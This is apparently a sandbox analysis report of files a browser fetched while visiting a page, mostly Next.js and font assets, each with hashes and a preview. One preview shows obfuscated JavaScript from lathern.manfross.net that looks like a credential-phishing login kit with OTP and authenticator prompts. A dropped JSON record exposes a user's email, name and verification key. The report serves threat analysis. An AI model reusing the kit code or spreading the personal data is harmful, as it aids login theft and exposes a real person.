                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2783],{73672:function(e,t,n){"use strict";let r,i,a,o,s,u;n.d(t,{PR:function(){return H},to:function(){return Z},YF:function(){return X},$A:function(){return W},_j:function(){return G},_4:function(){return B}});var l=n(95836),c=n(34),d=n(57709);let f=(e,t,n)=>{let r,i;return a=>{t.value>=0&&(a||n)&&((i=t.value-(r||0))||void 0===r)&&(r=t.value,t.delta=i,e(t))}};var p=n(10090);let h=()=>`v3-${Date.now()}-${Math.floor(Math.random()*(9e12-1))+1e12}`;var m=n(15269);let g=()=>{let e=(0,m.W)();return e&&e.activationStart||0},_=(e,t)=>{let n=(0,m.W)(),r="navigate";return n&&(r=p.WINDOW.document.prerendering||g()>0?"prerender":n.type.replace(/_/g,"-")),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:h(),navigationType:r}},y=(e,t,n)=>{try{if(PerformanceObserver.supportedEntryTypes.includes(e)){let r=new PerformanceObserver(e=>{t(e.getEntries())});return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}};v
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (13927), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):13937
                                                      Entropy (8bit):5.3154438179664245
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D7AE4D47E4BBB5B2EFDAB1C50F5CEA20
                                                      SHA1:05AF300128E2F3B874783BE4A61BA74AF5738F03
                                                      SHA-256:11092EED58A37E1928D31BE6217835C1EDC293F76D5F7FE37F16577CE0CAEAC1
                                                      SHA-512:1880F9E4B89B67022EE9DDBB33F8E08575962D7CCE1EB66A2180750FEBBEB1BDDA880C7BE3E2B772723FB51335DBC361ED35E6FF9B4E8A36F6F204F91E516DEC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/1133-760252f0fec193fb.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1133],{89539:function(t){var e,r,n,i,a,s,o,u,c,l,f,d,h,p,y,m,$,g,v,b,S,k;t.exports=(e="millisecond",r="second",n="minute",i="hour",a="week",s="month",o="quarter",u="year",c="date",l="Invalid Date",f=/^(\d{4})[-/]?(\d{1,2})?[-/]?(\d{0,2})[Tt\s]*(\d{1,2})?:?(\d{1,2})?:?(\d{1,2})?[.:]?(\d+)?$/,d=/\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1,2}|a|A|m{1,2}|s{1,2}|Z{1,2}|SSS/g,h=function(t,e,r){var n=String(t);return!n||n.length>=e?t:""+Array(e+1-n.length).join(r)+t},(y={})[p="en"]={name:"en",weekdays:"Sunday_Monday_Tuesday_Wednesday_Thursday_Friday_Saturday".split("_"),months:"January_February_March_April_May_June_July_August_September_October_November_December".split("_"),ordinal:function(t){var e=["th","st","nd","rd"],r=t%100;return"["+t+(e[(r-20)%10]||e[r]||"th")+"]"}},m="$isDayjsObject",$=function(t){return t instanceof S||!(!t||!t[m])},g=function t(e,r,n){var i;if(!e)return p;if("string"==typeof e){var a=e.toLowerCase();y[a
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (5121), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):5121
                                                      Entropy (8bit):5.447570781334907
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:729BDD846AB70E70A5E52D6B28D843C2
                                                      SHA1:E55B61CC6C4A0723B3565BFE7ADD572B8368C439
                                                      SHA-256:15BFAB5842CF275844CBC54B13E3B99EB56BBAA973C4702D81B72DE579D1AE1A
                                                      SHA-512:D85D651590C0892DED1181E881FD133C44CA5B3B442737912A0DC5D44E6EA623AB65CE2E8C78A941A31CCEF90B4707476217AEC207DAA69310C1304843042486
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/webpack-1d561e44c6b91a68.js
                                                      Preview:!function(){"use strict";var e,t,r,n,o,c,a,f,u,i={},d={};function b(e){var t=d[e];if(void 0!==t)return t.exports;var r=d[e]={id:e,loaded:!1,exports:{}},n=!0;try{i[e].call(r.exports,r,r.exports,b),n=!1}finally{n&&delete d[e]}return r.loaded=!0,r.exports}b.m=i,e=[],b.O=function(t,r,n,o){if(r){o=o||0;for(var c=e.length;c>0&&e[c-1][2]>o;c--)e[c]=e[c-1];e[c]=[r,n,o];return}for(var a=1/0,c=0;c<e.length;c++){for(var r=e[c][0],n=e[c][1],o=e[c][2],f=!0,u=0;u<r.length;u++)a>=o&&Object.keys(b.O).every(function(e){return b.O[e](r[u])})?r.splice(u--,1):(f=!1,o<a&&(a=o));if(f){e.splice(c--,1);var i=n();void 0!==i&&(t=i)}}return t},b.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return b.d(t,{a:t}),t},r=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},b.t=function(e,n){if(1&n&&(e=this(e)),8&n||"object"==typeof e&&e&&(4&n&&e.__esModule||16&n&&"function"==typeof e.then))return e;var o=Object.create(null);b.r(o);va
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):10796
                                                      Entropy (8bit):7.946024875001343
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:12BDACC832185D0367ECC23FD24C86CE
                                                      SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                      SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                      SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                      Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 81764, version 1.196
                                                      Category:downloaded
                                                      Size (bytes):81764
                                                      Entropy (8bit):7.997327688458369
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:2C8F7A3C71B776C33ECDC3A30E5238E9
                                                      SHA1:5D25CFFA84F8BAEF490B71E596CB566C24BAE9AD
                                                      SHA-256:C0536173078E072BBF0CC23FADC6A0D3FDD415569ED5F51AE510B82793A7D5FE
                                                      SHA-512:EF3080D2546CDADF68139CE688A392A128E1996462C5AAD27ADC432E33FD567669E1FD2F299FD9007C5BB25F9B6F849FB6EAAD986C552D2B03E691C2E22A62B4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/media/59457a906aa58c18-s.p.woff2
                                                      Preview:wOF2OTTO..?d.......$..?............................6..:........`....6.$..&...... [H....S.{.<Z.J.ue3..q......I.V.~.!..5...T.C.....D..'P..aX.m@;...^8..........[H..V...T.../...`\.!.$...*I.j...C/34..@.FD.;R......4.U\o..T.......OU.o.Qh. .c.K.S...k...n.w...J.51.}......T....z..12...].....m.n..#8.JT.zLe.M.....I..........xW...^......}....@`/....&#2ALP.....i.w.=..4..-.f..D.....f..6 ....6/...1f...p~....}./...d........&F*1AL...>.d.`..+[".`4d.$..=..<5..e...=9]...q......M.....c6.B/.r7.K.M..s.g..UU.l...BW.P.[t]ns..P.J.....f.d;.?f..... ._G.(.x.R.......|....G....z.FAA..O.D.z..x.......4.Q.T..Gs....T.f.^`W5m8..'.Y.y..RJ).&....c..Fr"..3q....8...J.n.2....ll@K.B{.C@2.2...-y.t..P...M.8....v....z4u<....^R=...E~.#?....p^Q.......*....Y@..../.V.....................".?D..E.......=k..jv...[..PaA....u....q.0mL....G...S.n.i........>G..tw..V...~q...7.>...6.z.HT..*..........N..>:I.>..O..?./I..Zw7...&0...L......d.2...wy.g?p..t...IQ....pS......[...LI.h.I.$.Q ...&u.K....T.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1476), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):38284
                                                      Entropy (8bit):5.112021368539161
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EA3C880120D132DD7E69D07025F11CF3
                                                      SHA1:466C053FBCC498C1B6D5D57704E579C017EB34B4
                                                      SHA-256:B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
                                                      SHA-512:F44047DA2C8FD10F7408B1C95EFA8051FC7C3C8FBEBE1AE4AE0E2BF44F720EF7AFCEC6468809894AC8D542D28AD842651B17E277D0EB343776B0D8DBBD6C5C30
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/ab4ltIxyrsYagh30
                                                      Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/testweb/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight:
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                      Category:downloaded
                                                      Size (bytes):1150
                                                      Entropy (8bit):6.20118795569983
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BF21895115F784158A27CFF211832237
                                                      SHA1:25C5396CD7C5F8BE25CFA1C773D4728855C10E7A
                                                      SHA-256:DB913F7B31D1ADACE84E13050022C5B41495190DEEC0CAC0649B0D8A43392696
                                                      SHA-512:133D10F15AE5A66A9F56B7A390B8BCC2782AFD7534B96047BBC1010CC7E76A38FBD0087EA75ECA537328DB67C2ED80850E83AF4FC6D7AD4DF8CB021619859381
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/favicon.ico
                                                      Preview:............ .h.......(....... ..... ..........................p...r.A.p...t...................................................r...u...y.C.}....!..!..!..!...............................s...x.x.{...~....................~.......................}...}.+.~.......i..)..,...*..I.............................,............=...........6.........................,.....7.........D...........D.....................,......4...............................'..$......,......4.....H..i........H..I..F..W.%..+..4......*.....F.....E.....j.......... ..&..,..2..8..................D................%..+..2..9..?..................J.............%..,..2..9...@...E...................... .... .."_.,^.2..9...@...G...L..........................(.'..)].)..9b..@...G...N...S..............'...........%..-..0\.0..!...F]..M...T...Z..................?..&..$..,..3..:...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4803), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):4803
                                                      Entropy (8bit):5.313389851587368
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D67DD5EA40987E7A54F5EB8CF1ACA1E7
                                                      SHA1:238BEDC512772FDF28B2CE989521E38A57483562
                                                      SHA-256:E397D5A6BB1BBAC47B8E08FC89733E9914A8C9F2AC5BC6E248B15C4BC5FBEBE4
                                                      SHA-512:5989444B0407D3FFE1CEED4D0B10BA46B2FBAA5A2A5EE12053BF1B8669A034057700B9912B88F73346BF3191317A80148385D2DBEDC6F72108A77B081FB15949
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/%5Blocale%5D/share/%5BpageToken%5D/page-3b80fc96d8fecdc9.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3825],{64063:function(e,n,t){Promise.resolve().then(t.bind(t,68019)),Promise.resolve().then(t.t.bind(t,81749,23)),Promise.resolve().then(t.bind(t,62108)),Promise.resolve().then(t.bind(t,78409)),Promise.resolve().then(t.t.bind(t,56468,23)),Promise.resolve().then(t.bind(t,72342)),Promise.resolve().then(t.bind(t,5654)),Promise.resolve().then(t.bind(t,7577)),Promise.resolve().then(t.bind(t,10103)),Promise.resolve().then(t.bind(t,97575)),Promise.resolve().then(t.bind(t,89658)),Promise.resolve().then(t.bind(t,35287)),Promise.resolve().then(t.bind(t,7980)),Promise.resolve().then(t.bind(t,13201))},39635:function(e,n,t){var r=t(23393);e.exports=function(e){return r(e)?void 0:e}},37525:function(e,n,t){var r=t(98007),i=t(7157),o=t(18501);e.exports=function(e){return o(i(e,void 0,r),e+"")}},98007:function(e,n,t){var r=t(9677);e.exports=function(e){return(null==e?0:e.length)?r(e,1):[]}},22071:function(e,n,t){var r=t(83690),i=t(42993),o=t(8160
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (5866), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):5866
                                                      Entropy (8bit):5.373959851383189
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7D24BE9BF1749EC99263265773121003
                                                      SHA1:51BEA1685ABBB0A30AFBC4D84CB0FBF0A2D938AB
                                                      SHA-256:0BDFE8FAB2C4BD16511645DA2495B9E50EC6499B87AD43837DEC06B0A41EE483
                                                      SHA-512:CA47BD752B1C5662A3B7CA73E4A373E0BB0C9D43E60ACC4605D5BE0DDA99E0FB425C97638AC32D8B05768B7D2E71C20C873F9D402114AA2F673AF12841CE092B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/1720-68cc0ca0c832b9f4.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1720],{91077:function(t,e){function r(){return(r=Object.assign?Object.assign.bind():function(t){for(var e=1;e<arguments.length;e++){var r=arguments[e];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(t[n]=r[n])}return t}).apply(this,arguments)}Object.defineProperty(e,"__esModule",{value:!0}),e.extends=r},38509:function(t,e,r){Object.defineProperty(e,"__esModule",{value:!0});var n=r(47907),o=r(20237),c=r(72611);e.default=function(){let t;let e=n.useParams();try{t=o.useLocale()}catch(r){if("string"!=typeof(null==e?void 0:e[c.LOCALE_SEGMENT_NAME]))throw r;t=e[c.LOCALE_SEGMENT_NAME]}return t}},72611:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.COOKIE_LOCALE_NAME="NEXT_LOCALE",e.COOKIE_MAX_AGE=31536e3,e.COOKIE_SAME_SITE="strict",e.HEADER_LOCALE_NAME="X-NEXT-INTL-LOCALE",e.LOCALE_SEGMENT_NAME="locale"},47907:function(t,e,r){r.r(e);var n=r(15313),o={};for(var c in n)"default"!==c&&(o[c]=(functi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):1400
                                                      Entropy (8bit):7.808470583085035
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:333EE830E5AB72C41DD9126A27B4D878
                                                      SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                      SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                      SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/klMEiNOusRuYbM4FM8nvvQsoP2t71IMcs8YyrkW89jTC0pGf2aQu2C7HANY75Nab221
                                                      Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (45667)
                                                      Category:downloaded
                                                      Size (bytes):45806
                                                      Entropy (8bit):5.207605835316031
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                      SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                      SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                      SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                      Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 86584, version 1.196
                                                      Category:downloaded
                                                      Size (bytes):86584
                                                      Entropy (8bit):7.997223652893204
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:71C7FAC43044FABD9A0CAD2AA4A85580
                                                      SHA1:6DBE720CBEDF60330883E3F39A95DA2B3712B05C
                                                      SHA-256:9E1D75705D6B2468C9C2AD60D212D0F4F84725D3046011DC056FE9D4D68070DA
                                                      SHA-512:DDDB59BBDF32FF6F731A3B42E0FCBF1CBF7482A63518A3AFFAA0B7BAA448C9E5ABDC7CE1D7BA96E3FF07038EBCF077D1C01250B81C3A393111CEE049FE1CC6B4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/media/04d4d49fd9dfaa3d-s.p.woff2
                                                      Preview:wOF2OTTO..R8.......h..Q............................!..:...t....`....6.$..&...... [....w.........1..vVcT....KX..w?. m.>..R.:=.1d......7P9L.z;.sk+..K.............. ..g.$.X...........S....&J--.]:.....(......r6if....,a.en(....^..^...f.+.&..r/.......h...........<0.J.P.<.J(G...e.wu.7.%...k..Z....i>Rbi..W.z...i.Q..Rj.*5..$$!q.j.t.4M.W.b.}T..]{.....%.3.....~U......kd..\X..-...7G.....euW....Z.x...o...1~hWk.cDf.d.z).*.I...nX.>I.R.y......dy...U'...i.k45I}...'.Vt.>.u..V.....I._.0..89.'.r:.H.*.....0H.<..X..*.W..T...eF......gGV.]....KG`.Fx...<._..+.n.......+.i.|.V.t.n)_..E.:.w{...+...Z^I..T.$KTT.*...X..G....mFy%.Q.(,..I..h.D..l..B1..F1R...j....G.{.......j..:.e..$.>....t.|D.N.....w~.^.......;.c.*....~.A;./.J..D...."7G....,4. ../...99,.'<...;..K.J..]\H.l.{s.S.'8|.uDQ.Q.....nO....D=.......d.z.......[..~|..'&.$+~.=Z..z... /..F..e..L...b..~.7Dm.{q...^v...v...w.......n.,..S!:.G.f..T.<6GM.E..b. ...&......f....1.iK.BM.../..Ef.2C.). ....j...Sl....>#l8q.....4.^.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):66541
                                                      Entropy (8bit):5.03953661958577
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0C23CFFFC69C9F154FFE89CCDB12D44C
                                                      SHA1:F7E913275118D3C7CFCE103759610929B2C52ED7
                                                      SHA-256:09ABC6C74C0B2A17E91319C15126B38B8B949BA2B78ACDF216E901B88F8329AB
                                                      SHA-512:03C837FCE2780A89A5E6012A57FB1AB9B2E9A9AC2D71E4330974AE6146097D444982E38DC05B47DB70A8D001E5C9AA9A2BB8F0C6A1580C809EADD30295B2A0DE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/6be7e44c-249b90aa89e7a929.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9900],{69697:function(t,e,r){r.d(e,{$4:function(){return tw},$_:function(){return ri},BW:function(){return tp},CO:function(){return tA},D$:function(){return tt},H6:function(){return tZ},MM:function(){return re},NG:function(){return X},Ox:function(){return tv},QW:function(){return U},UQ:function(){return E},Uq:function(){return tC},VG:function(){return M},Zi:function(){return t_},aC:function(){return tD},at:function(){return tf},ck:function(){return rm},eI:function(){return e6},gJ:function(){return ts},lt:function(){return e0},og:function(){return tk},or:function(){return tE},uY:function(){return D},ud:function(){return ef},w$:function(){return tS},xv:function(){return eX},zc:function(){return rg}});var n=r(95704),i=r(79856),l=r(26993),s=r(57607),o=r(16049),c=r(54565),h=r(83973),d=r(77444),u=r(90624),a=r(70330),g=r(90280),f=r(60304),p=r(62080),w=r(25130),_=r(58556),k=r(71674),m=r(723),y=r(73226);class b{constructor(t,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):103933
                                                      Entropy (8bit):5.201385561091186
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7BCC10882A3FEE621FCD4FF3CCE42AFA
                                                      SHA1:EDD5F4E27DB9BCA62499172114C24ED4E634E2C4
                                                      SHA-256:DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
                                                      SHA-512:77BE919702CDAF6184C00E90439FD5A1A40D2F8FCB9FF26983FF43995B4585EB24BFE130BBDC372D8233BFC17F21F39168683BC18AD4B0B6ACEC8EDF6B3A00A4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/56At5LP8Dxh6A9dLJznMlBT4OkldO0PDBt9FWKSKm67107
                                                      Preview:const _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg','backbtnid','otp\x20sent\x20error','section_otp','dirltr','span','backgroundImage','includes','error_verifyemail','backbtnclick','error-inp','head','selecttwofamethod(this)','.bannerlogo','Forgot\x20my\x20password','assertive','loading','try_again_otp','fail','section_authapp','#section_uname_content','section_signinanothererror','removeAttribute','a_text','app','section_uname','hide-to-left\x200.5s','button','</label>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\x22\x20class=\x22form-group-top\x22\x20ari
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):788
                                                      Entropy (8bit):5.178667134086616
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EF42354E615FA3F32D5187ED149A0D54
                                                      SHA1:0A2868356BD3C29107650FD6CE2B0D260B78F331
                                                      SHA-256:651A224DEA0230DD1E943AA721B971F1F743CCA9FA2EC4856CD3BB93E4A8D6BF
                                                      SHA-512:90474C28FB4C5804F7AB2F67BF765A892BCDD00D2FC148F92AE5C7059C7DEBA33856BDC5D7F7DC7C4EA074366EC3C448C10CCBB22472CC642F8B41D67320E87C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:{"id":"98c0fad7-1215-4912-8f07-6651d2fefcf8","role":"owner","createdAt":"2024-07-01T12:03:42.791Z","updatedAt":"2024-07-01T14:10:36.019Z","accountId":"488bb1a3-8070-4a6f-901f-a3fc01e7528a","userId":"98c0fad7-1215-4912-8f07-6651d2fefcf8","email":"fridaymrrs@gmail.com","fullName":"Ria Cole","displayName":null,"avatar":"https://api.beta.slimwiki.com/api/v1/assets/users%2F98c0fad7-1215-4912-8f07-6651d2fefcf8%2Favatars%2Fpdf-20image-16c0e44d-6910-44d2-906c-bb96023bb4f0.png","isEmailVerified":false,"isSuperAdmin":false,"emailVerificationKey":"3fe4abe3-ba96-49ec-ad8e-a8c42d3d749e","emailVerificationRequestDate":"2024-07-01T14:03:42.940Z","passwordResetKey":null,"passwordResetRequestDate":null,"mailerLiteSubscriptionId":null,"onboardingStatus":null,"isMaintenanceNoticeDismissed":false}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):49602
                                                      Entropy (8bit):7.881935507115631
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:DB783743CD246FF4D77F4A3694285989
                                                      SHA1:B9466716904457641B7831868B47162D8D378D41
                                                      SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                      SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                      Malicious:false
                                                      Reputation:unknown
